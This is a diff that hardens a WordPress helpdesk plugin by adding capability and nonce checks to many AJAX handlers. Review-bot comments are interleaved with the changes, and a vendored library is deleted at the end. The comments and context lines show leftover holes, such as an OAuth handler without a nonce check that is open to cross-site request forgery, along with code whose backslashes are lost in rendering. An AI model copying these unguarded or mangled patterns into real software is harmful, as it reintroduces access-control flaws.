 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$ticket_id  = isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null;
 			$assignee   = isset( $_POST['assignee'] ) ? sanitize_text_field( $_POST['assignee'] ) : null;
 			$pagination = json_decode( stripslashes( isset( $_POST['pagination_id'] ) ? sanitize_text_field( $_POST['pagination_id'] ) : null ), true );
@@ -1559,6 +1568,9 @@

 	public static function eh_crm_archive_single_ticket() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			global $wpdb;
 			$filter = array(
 				'ticket_id' => array( isset( $_POST['ticket_id'] ) ? sanitize_text_field( $_POST['ticket_id'] ) : null ),
@@ -1629,6 +1641,9 @@

 	public static function eh_crm_ticket_multiple_ticket_action() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			global $wpdb;

 			$repo       = new WSDeskTicketsTicketRepository();
@@ -2008,6 +2023,10 @@
 	}

 	public static function eh_crm_ticket_add_new() {
+		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		ob_start();
 		$logged_user      = wp_get_current_user();
 		$logged_user_caps = array_keys( $logged_user->caps );
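Review bot: this hunk opens a new `if ( wp_verify_nonce( ... ) ) {` around the whole body of `eh_crm_ticket_add_new()` but leaves the body (`ob_start();` onward) at its old indentation, and the matching `}` only appears in the following hunk, several hundred lines later, which makes the brace pairing hard to verify by eye. An early-return guard (`if ( ! wp_verify_nonce( ... ) ) { wp_send_json_error( ..., 400 ); }`) followed by the capability check would achieve the same without re-nesting the function, and would give callers that omit `nonce` an error instead of an empty response.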
@@ -2342,10 +2361,14 @@
 					)
 				)
 			);
+		}
 	}

 	public static function eh_crm_ticket_new_submit() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_tickets' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$email      = isset( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : null;
 			$title      = isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null;
 			$desc       = str_replace( "n", '<br/>', isset( $_POST['desc'] ) ? sanitize_text_field( $_POST['desc'] ) : null );
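Review bot: in the context line `$desc = str_replace( "n", '<br/>', ... )` the search string is the letter `n`, not a newline, so every `n` in the description is replaced with `<br/>`; this looks like a lost backslash (`"\n"`). It is not introduced by this patch, but worth fixing while the function is being touched, and note that `sanitize_text_field()` already removes line breaks, so even `"\n"` would never match here; `sanitize_textarea_field()` preserves them.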
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-two.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions-two.php
@@ -14,6 +14,9 @@
 		if (!wp_verify_nonce($nonce, 'wsdesk_nonce')) {
 			wp_send_json_error(['message' => 'Invalid nonce.'], 400);
 		}
+		if (!current_user_can('administrator') && !current_user_can('agents_page')) {
+			wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+		}
 		$current_user = wp_get_current_user();
 		$user_roles   = $current_user->roles;

@@ -90,6 +93,9 @@
 	public static function eh_crm_remove_agent()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('agents_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$current_user = wp_get_current_user();
 			$user_roles = $current_user->roles;

@@ -1545,6 +1551,9 @@
 	public static function eh_crm_ticket_single_save_props()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('manage_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$ticket_id = isset($_POST['ticket_id']) ? sanitize_text_field($_POST['ticket_id']) : null;
 			$assignee = ((isset($_POST['assignee']) ? sanitize_text_field($_POST['assignee']) : null !== '') ? explode(',', sanitize_text_field($_POST['assignee'])) : array());
 			$tags = ((isset($_POST['tags']) ? sanitize_text_field($_POST['tags']) : null !== '') ? explode(',', isset($_POST['tags']) ? sanitize_text_field($_POST['tags']) : null) : array());
@@ -1582,6 +1591,9 @@
 	public static function eh_crm_ticket_single_delete()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$ticket_id = isset($_POST['ticket_id']) ? sanitize_text_field($_POST['ticket_id']) : '';
 			$child = eh_crm_get_ticket_value_count('ticket_parent', $ticket_id);
 			for ($i = 0; $i < count($child); $i++) {
@@ -1595,6 +1607,9 @@
 	{

 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$repo = new WSDeskTicketsTicketRepository();
 			$filters = $_POST;
 			if (isset($_post['tickets_id'])) {
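Review bot: the context line `if (isset($_post['tickets_id']))` reads the lowercase `$_post`, an ordinary undefined variable rather than the `$_POST` superglobal, so that branch can never run. Pre-existing, but since `$filters = $_POST;` on the line above passes the whole request array to the repository, the intent of this block deserves a look while a `delete_tickets` capability check is being added to it.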
@@ -1622,12 +1637,8 @@
 	public static function eh_crm_settings_empty_scheduled_actions()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('settings_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			delete_option('wsdesk_scheduled_triggers', '');
 			die(json_encode(array('result' => 'success')));
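Review bot: `delete_option('wsdesk_scheduled_triggers', '')` passes a second argument that `delete_option()` does not take; harmless but misleading, drop it. The success path `die(json_encode(array('result' => 'success')))` also bypasses `wp_send_json_success()`, so after this change the error path (the new `wp_send_json_error(..., 403)`) and the success path use different serialization helpers.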
@@ -1638,11 +1649,8 @@
 	{
 		set_time_limit(300);
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			global $wpdb;
 			$table = $wpdb->prefix . 'wsdesk_tickets';
@@ -1675,11 +1683,8 @@
 	{
 		set_time_limit(300);
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
-			$current_user = wp_get_current_user();
-			$user_roles = $current_user->roles;
-
-			if (!in_array('administrator', $user_roles, true) && !in_array('WSDesk_Supervisor', $user_roles, true)) {
-				wp_send_json_error(array('message' => 'Unauthorized User.'), 403);
+			if (!current_user_can('administrator') && !current_user_can('delete_tickets')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
 			}
 			global $wpdb;
 			$table = $wpdb->prefix . 'wsdesk_tickets';
@@ -1711,6 +1716,9 @@
 	public static function eh_crm_export_ticket_data()
 	{
 		if (wp_verify_nonce(isset($_POST['nonce']) ? sanitize_text_field($_POST['nonce']) : '', 'wsdesk_nonce')) {
+			if (!current_user_can('administrator') && !current_user_can('import_page')) {
+				wp_send_json_error(['message' => __('You are not authorized to perform this action.', 'wsdesk')], 403);
+			}
 			$start_date = date_create(isset($_POST['export_start_date']) ? sanitize_text_field($_POST['export_start_date']) : null);
 			$end_date = date_create(isset($_POST['export_end_date']) ? sanitize_text_field($_POST['export_end_date']) : null);
 			if (!$end_date) {
--- a/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions.php
+++ b/elex-helpdesk-customer-support-ticket-system/includes/class-crm-ajax-functions.php
@@ -668,6 +668,9 @@

 	public static function eh_crm_activate_oauth() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$client_id     = isset( $_POST['client_id'] ) ? sanitize_text_field( $_POST['client_id'] ) : null;
 			$client_secret = isset( $_POST['client_secret'] ) ? sanitize_text_field( $_POST['client_secret'] ) : null;
 			eh_crm_update_settingsmeta( 0, 'oauth_client_id', $client_id );
@@ -679,6 +682,9 @@
 	}

 	public static function eh_crm_deactivate_oauth() {
+		if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+			wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+		}
 		$oauth_obj = new EH_CRM_OAuth();
 		$oauth_obj->revoke_token();

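Review bot: `eh_crm_deactivate_oauth()` gains a capability check but, unlike every sibling handler in this file, is still not wrapped in `wp_verify_nonce(...)`; an authorized user who is tricked into submitting a cross-site request could therefore have the OAuth token revoked. Wrap the body in the same nonce check used by `eh_crm_activate_oauth()` above, as this diff already does for `eh_crm_zendesk_stop_pull_tickets()` further down.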
@@ -692,6 +698,9 @@

 	public static function eh_crm_activate_email_protocol() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$server_url   = isset( $_POST['server_url'] ) ? sanitize_text_field( $_POST['server_url'] ) : null;
 			$server_port  = isset( $_POST['server_port'] ) ? sanitize_text_field( $_POST['server_port'] ) : null;
 			$email        = isset( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : null;
@@ -791,6 +800,9 @@

 	public static function eh_crm_deactivate_email_protocol() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$id = isset( $_POST['id'] ) ? sanitize_text_field( $_POST['id'] ) : null;
 			if ( $id ) {
 				$imap_account_data = array_values( eh_crm_get_settingsmeta( '0', 'imap_account_data' ) );
@@ -806,6 +818,9 @@

 	public static function eh_crm_email_block_filter() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_block = json_decode( stripslashes( isset( $_POST['new_block'] ) ? sanitize_text_field( $_POST['new_block'] ) : null ), true );
 			if ( ! empty( $new_block ) ) {

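Review bot: The authorization check itself is fine, but the context line below it runs `sanitize_text_field()` on the raw JSON string before `json_decode()`; that helper rewrites `<`, strips tag-like sequences and `%xx` octets and removes newlines, so a legitimate filter containing such characters can be corrupted or fail to decode. Decode first, then sanitize each element of the resulting array with `sanitize_text_field()` (or `sanitize_email()` for addresses), and treat a `null` decode result as an error rather than an empty filter.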
@@ -835,6 +850,9 @@

 	public static function eh_crm_subject_block_filter() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$new_block = json_decode( stripslashes( isset( $_POST['new_block'] ) ? sanitize_text_field( $_POST['new_block'] ) : null ), true );
 			if ( ! empty( $new_block ) ) {

@@ -864,6 +882,9 @@

 	public static function eh_crm_email_block_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$block_remove = isset( $_POST['block_remove'] ) ? sanitize_text_field( $_POST['block_remove'] ) : null;
 			$block_filter = eh_crm_get_settingsmeta( '0', 'email_block_filters' );
 			if ( ! $block_filter ) {
@@ -884,6 +905,9 @@

 	public static function eh_crm_subject_block_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$block_remove = isset( $_POST['block_remove'] ) ? sanitize_text_field( $_POST['block_remove'] ) : null;
 			$block_filter = eh_crm_get_settingsmeta( '0', 'subject_block_filters' );
 			if ( ! $block_filter ) {
@@ -1280,6 +1304,9 @@

 	public static function eh_crm_email_support_save() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'email_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$support_email_name    = isset( $_POST['support_email_name'] ) ? sanitize_text_field( $_POST['support_email_name'] ) : null;
 			$support_email         = isset( $_POST['support_email'] ) ? sanitize_text_field( $_POST['support_email'] ) : null;
 			$new_ticket_text       = isset( $_POST['new_ticket_text'] ) ? wp_kses_post( $_POST['new_ticket_text'] ) : null;
@@ -1298,6 +1325,9 @@

 	public static function eh_crm_backup_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			require_once EH_CRM_MAIN_PATH . 'includes/class-crm-backup-restore.php';
 			$post  = $_POST;
 			$start = isset( $_POST['backup_date_range_start'] ) ? sanitize_text_field( $_POST['backup_date_range_start'] ) : null;
@@ -1310,11 +1340,8 @@

 	public static function eh_crm_restore_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
-			$current_user = wp_get_current_user();
-			$user_roles   = $current_user->roles;
-
-			if ( ! in_array( 'administrator', $user_roles, true ) && ! in_array( 'WSDesk_Supervisor', $user_roles, true ) ) {
-				wp_send_json_error( array( 'message' => 'Unauthorized User.' ), 403 );
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
 			}
 			require_once EH_CRM_MAIN_PATH . 'includes/class-crm-backup-restore.php';
 			if ( isset( $_FILES['file'] ) && ! empty( $_FILES['file'] ) ) {
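Review bot: Restricting restore to `import_page` is the right level, since replaying an uploaded archive is at least as sensitive as any settings write; note, though, that all validation of `$_FILES['file']` (type, size, contents) happens in `class-crm-backup-restore.php`, which this diff does not touch, so confirm that file rejects unexpected content instead of relying on the capability check alone.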
@@ -1330,6 +1357,9 @@

 	public static function eh_crm_zendesk_save_data() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$token     = isset( $_POST['token'] ) ? sanitize_text_field( $_POST['token'] ) : null;
 			$subdomain = isset( $_POST['subdomain'] ) ? sanitize_text_field( $_POST['subdomain'] ) : null;
 			$username  = isset( $_POST['username'] ) ? sanitize_text_field( $_POST['username'] ) : null;
@@ -1342,6 +1372,9 @@

 	public static function eh_crm_zendesk_pull_tickets() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'started' );
 			eh_crm_write_log( '' );
 			$page       = isset( $_POST['page'] ) ? sanitize_text_field( $_POST['page'] ) : null
@@ -1374,6 +1407,9 @@

 	public static function eh_crm_live_log() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			if ( isset( $_GET['action'] ) ) {
 				if ( ! session_id() ) {
 					session_start();
@@ -1403,8 +1439,13 @@
 	}

 	public static function eh_crm_zendesk_stop_pull_tickets() {
-		eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'stopped' );
-		die();
+		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'import_page' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
+			eh_crm_update_settingsmeta( 0, 'zendesk_tickets_import', 'stopped' );
+			die();
+		}
 	}

 	public static function eh_crm_woo_report_products() {
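Review bot: Adding both the nonce and the capability check to `eh_crm_zendesk_stop_pull_tickets()` closes a handler that previously had neither, but the new nonce-failure path is silent: when `wp_verify_nonce()` returns false the function simply falls through and `admin-ajax.php` answers with its default `0`, unlike the explicit 403 JSON used for the capability failure. Return `wp_send_json_error()` from an `else` branch as well so both failures are visible to the caller and to request logs.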
@@ -1425,6 +1466,9 @@

 	public static function eh_crm_ticket_new_template() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$title            = stripslashes( isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null );
 			$content          = stripslashes( isset( $_POST['content'] ) ? wp_kses_post( $_POST['content'] ) : null );
 			$insert           = array(
@@ -1468,6 +1512,9 @@

 	public static function eh_crm_ticket_update_template() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$slug    = stripslashes( isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null );
 			$title   = stripslashes( isset( $_POST['title'] ) ? sanitize_text_field( $_POST['title'] ) : null );
 			$content = stripslashes( isset( $_POST['content'] ) ? wp_kses_post( $_POST['content'] ) : null );
@@ -1480,6 +1527,9 @@

 	public static function eh_crm_ticket_template_delete() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$slug = isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null;
 			$temp = eh_crm_get_settings( array( 'slug' => $slug ) );
 			eh_crm_delete_settings( $temp[0]['settings_id'] );
@@ -1509,6 +1559,9 @@
 	}
 	public static function eh_crm_ticket_template_search() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 			$text = isset( $_POST['text'] ) ? sanitize_text_field( $_POST['text'] ) : '';
 			set_time_limit( 300 );
 			global $wpdb;
@@ -1548,6 +1601,9 @@

 	public static function eh_crm_ticket_edit_template_content() {
 		if ( wp_verify_nonce( isset( $_POST['nonce'] ) ? sanitize_text_field( $_POST['nonce'] ) : '', 'wsdesk_nonce' ) ) {
+			if ( ! current_user_can( 'administrator' ) && ! current_user_can( 'manage_templates' ) ) {
+				wp_send_json_error( array( 'message' => __( 'You are not authorized to perform this action.', 'wsdesk' ) ), 403 );
+			}
 		$slug         = isset( $_POST['slug'] ) ? sanitize_text_field( $_POST['slug'] ) : null;
 		$temp         = eh_crm_get_settings( array( 'slug' => $slug ) );
 		$temp_meta    = eh_crm_get_settingsmeta( $temp[0]['settings_id'] );
@@ -1878,8 +1934,8 @@
 			$files_values = $_FILES;
 			$files        = isset( $files_values['file'] ) ? $files_values['file'] : '';
 			$email        = $post_values['request_email'];
-			$title        = stripslashes( $post_values['request_title'] );
-			$desc         = str_replace( "n", '<br/>', stripslashes( $post_values['request_description'] ) );
+			$title        = sanitize_text_field( stripslashes( $post_values['request_title'] ) );
+			$desc         = wp_kses_post( str_replace( "n", '<br/>', stripslashes( $post_values['request_description'] ) ) );
 			$vendor       = '';
 		if ( EH_CRM_WOO_STATUS ) {
 			if ( isset( $post_values['woo_vendors'] ) ) {
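Review bot: Wrapping the title in `sanitize_text_field()` and the description in `wp_kses_post()` is a separate output-hardening fix bundled into this release and is ordered correctly (`stripslashes()` first, `<br/>` substitution inside the kses call so the tag survives). One thing to verify in the source: as rendered here the replacement searches for `"n"`, which would turn every letter n into `<br/>`; if the intended value is `"\n"` and the backslash was lost in display, fine, otherwise this is a bug in the unchanged part of the line.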
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonDoctrineType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonDoctrineType.php
@@ -1,14 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use DoctrineDBALPlatformsAbstractPlatform;
-
-interface CarbonDoctrineType
-{
-    public function getSQLDeclaration(array $fieldDeclaration, AbstractPlatform $platform);
-
-    public function convertToPHPValue($value, AbstractPlatform $platform);
-
-    public function convertToDatabaseValue($value, AbstractPlatform $platform);
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonImmutableType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonImmutableType.php
@@ -1,7 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class CarbonImmutableType extends DateTimeImmutableType implements CarbonDoctrineType
-{
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonType.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonType.php
@@ -1,7 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-class CarbonType extends DateTimeType implements CarbonDoctrineType
-{
-}
--- a/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonTypeConverter.php
+++ b/elex-helpdesk-customer-support-ticket-system/vendor/carbonphp/carbon-doctrine-types/src/Carbon/Doctrine/CarbonTypeConverter.php
@@ -1,141 +0,0 @@
-<?php
-
-namespace CarbonDoctrine;
-
-use CarbonCarbon;
-use CarbonCarbonInterface;
-use DateTimeInterface;
-use DoctrineDBALPlatformsAbstractPlatform;
-use DoctrineDBALPlatformsDB2Platform;
-use DoctrineDBALPlatformsOraclePlatform;
-use DoctrineDBALPlatformsSqlitePlatform;
-use DoctrineDBALPlatformsSQLServerPlatform;
-use DoctrineDBALTypesConversionException;
-use Exception;
-
-/**
- * @template T of CarbonInterface
- */
-trait CarbonTypeConverter
-{
-    /**
-     * This property differentiates types installed by carbonphp/carbon-doctrine-types
-     * from the ones embedded previously in nesbot/carbon source directly.
-     *
-     * @readonly
-     */
-    public bool $external = true;
-
-    /**
-     * @return class-string<T>
-     */
-    protected function getCarbonClassName(): string
-    {
-        return Carbon::class;
-    }
-
-    public function getSQLDeclaration(array $fieldDeclaration, AbstractPlatform $platform): string
-    {
-        $precision = min(
-            $fieldDeclaration['precision'] ?? DateTimeDefaultPrecision::get(),
-            $this->getMaximumPrecision($platform),
-        );
-
-        $type = parent::getSQLDeclaration($fieldDeclaration, $platform);
-
-        if (!$precision) {
-            return $type;
-        }
-
-        if (str_contains($type, '(')) {
-            return preg_replace('/(d+)/', "($precision)", $type);
-        }
-
-        [$before, $after] = explode(' ', "$type ");
-
-        return trim("$before($precision) $after");
-    }
-
-    /**
-     * @SuppressWarnings(PHPMD.UnusedFormalParameter)
-     *
-     * @return T|null
-     */
-    public function convertToPHPValue($value, AbstractPlatform $platform)
-    {
-        $class = $this->getCarbonClassName();
-
-        if ($value === null || is_a($value, $class)) {
-            return $value;
-        }
-
-        if ($value instanceof DateTimeInterface) {
-            return $class::instance($value);
-        }
-
-        $date = null;
-        $error = null;
-
-        try {
-            $date = $class::parse($value);
-        } catch (Exception $exception) {
-            $error = $exception;
-        }
-
-        if (!$date) {
-            throw ConversionException::conversionFailedFormat(
-                $value,
-                $this->getTypeName(),
-                'Y-m-d H:i:s.u or any format supported by '.$class.'::parse()',
-                $error
-            );
-        }
-
-        return $date;
-    }
-
-    /**
-     * @SuppressWarnings(PHPMD.UnusedFormalParameter)
-     */
-    public function convertToDatabaseValue($value, AbstractPlatform $platform): ?string
-    {
-        if ($value === null) {
-            return $value;
-        }
-
-        if ($value instanceof DateTimeInterface) {
-            return $value->format('Y-m-d H:i:s.u');
-        }
-
-        throw ConversionException::conversionFailedInvalidType(
-            $value,
-            $this->getTypeName(),
-            ['null', 'DateTime', 'Carbon']
-        );
-    }
-
-    private function getTypeName(): string
-    {
-        $chunks = explode('\', static::class);
-        $type = preg_replace('/Type$/', '', end($chunks));
-
-        return strtolower(preg_replace('/([a-z])([A-Z])/', '$1_$2', $type));
-    }
-
-    private function getMaximumPrecision(AbstractPlatform $platform): int
-    {
-        if ($platform instanceof DB2Platform) {
-            return 12;
-        }
-
-        if ($platform instanceof OraclePlatform) {
-            return 9;
-        }
-
-        if ($platform instanceof SQLServerPlatform || $platform instanceof SqlitePlatform) {
-            return 3;
-        }
-
